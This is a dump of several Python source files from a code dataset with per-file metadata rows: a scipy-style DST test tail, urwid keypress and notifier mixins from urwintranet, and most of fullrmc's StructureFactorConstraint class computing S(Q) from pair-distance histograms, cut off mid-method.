for dtype in self.real_dtypes:
self._check_1d(dst, dtype, (16,), -1, overwritable)
self._check_1d(dst, dtype, (16, 2), 0, overwritable)
self._check_1d(dst, dtype, (2, 16), 1, overwritable)
def test_idst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idst, dtype, (16,), -1, overwritable)
self._check_1d(idst, dtype, (16, 2), 0, overwritable)
self._check_1d(idst, dtype, (2, 16), 1, overwritable)
if __name__ == "__main__":
np.testing.run_module_suite()
| mit | -2,302,924,072,416,488,400 | 27.3327 | 86 | 0.551902 | false | 3.291299 | true | false | false |
jespino/urwintranet | urwintranet/ui/widgets/mixins.py | 1 | 3127 | # -*- coding: utf-8 -*-
"""
urwintranet.ui.widgets.mixins
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import urwid
class IgnoreKeyPressMixin(object):
def keypress(self, size, key):
return key
class KeyPressMixin(object):
signals = ["click"]
def keypress(self, size, key):
"""
Send 'click' signal on 'activate' command.
>>> assert Button._command_map[' '] == 'activate'
>>> assert Button._command_map['enter'] == 'activate'
>>> size = (15,)
>>> b = Button("Cancel")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.keypress(size, 'enter')
>>> b.keypress(size, ' ')
>>> clicked_buttons # ... = u in Python 2
[...'Cancel', ...'Cancel']
"""
if self._command_map[key] != urwid.ACTIVATE:
return key
self._emit('click')
def mouse_event(self, size, event, button, x, y, focus):
"""
Send 'click' signal on button 1 press.
>>> size = (15,)
>>> b = Button("Ok")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.mouse_event(size, 'mouse press', 1, 4, 0, True)
True
>>> b.mouse_event(size, 'mouse press', 2, 4, 0, True) # ignored
False
>>> clicked_buttons # ... = u in Python 2
[...'Ok']
"""
if button != 1 or not urwid.util.is_mouse_press(event):
return False
self._emit('click')
return True
class FormMixin(object):
FORM_KEYS = {
"tab": "down",
"shift tab": "up",
}
def keypress(self, size, key):
key = self.FORM_KEYS.get(key, key)
return super().keypress(size, key)
class ViMotionMixin(object):
VI_KEYS = {
"j": "down",
"k": "up",
"h": "left",
"l": "right",
}
def keypress(self, size, key):
key = self.VI_KEYS.get(key, key)
return super().keypress(size, key)
class EmacsMotionMixin(object):
EMACS_KEYS = {
"ctrl n": "down",
"ctrl p": "up",
"ctrl b": "left",
"ctrl f": "right",
}
def keypress(self, size, key):
key = self.EMACS_KEYS.get(key, key)
return super().keypress(size, key)
class NotifierMixin(object):
ERROR_PREFIX = ""
ERROR_ATTR = "error"
INFO_PREFIX = ""
INFO_ATTR = "info"
ALIGN = "center"
def error_msg(self, text):
self.set_text((self.ERROR_ATTR, self.ERROR_PREFIX + text))
self.set_align_mode(self.ALIGN)
def info_msg(self, text):
self.set_text((self.INFO_ATTR, self.INFO_PREFIX + text))
self.set_align_mode(self.ALIGN)
def clear_msg(self):
self.set_text("")
class PlainButtonMixin(object):
button_left = urwid.Text("")
button_right = urwid.Text("")
class NonSelectableMixin(object):
def selectable(self):
return False
| apache-2.0 | 4,975,754,046,936,183,000 | 24.016 | 71 | 0.523825 | false | 3.505605 | false | false | false |
bachiraoun/fullrmc | Constraints/StructureFactorConstraints.py | 1 | 64342 | """
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
Controls the Structure Factor noted as S(Q) and also called
total-scattering structure function or Static Structure Factor.
S(Q) is a dimensionless quantity and normalized such as the average
value :math:`<S(Q)>=1`.
It is worth mentioning that S(Q) is nothing other than the normalized and
corrected diffraction pattern if all experimental artefacts powder.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
From an atomistic model and histogram point of view, G(r) is computed as
the following:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
g(r) is calculated after binning all pair atomic distances into a
weighted histograms as the following:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
important in order to get a reasonable and plausible modal.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
If numpy.ndarray is given, all weights must be positive and all
zeros weighted data points won't contribute to the total
constraint's standard error. At least a single weight point is
required to be non-zeros and the weights array will be automatically
scaled upon setting such as the the sum of all the weights
is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
histograms. If None is given, the limits will be automatically
set the the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
shapeFuncParams=sfp, windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
Custom set atoms weight. This is the way to setting a atoms weights
different than the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambigous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
#. message (str): Checking message that explains whats's wrong
with the given data
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
Compute the standard error (StdErr) as the squared deviations
between model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
:math:`F(X_{i})` is the computed from the model data :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
# Devide by shells volume
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# Multiply by scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and this will create a wrong scale factor.
Overloading can be avoided but it's better to for performance reasons
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
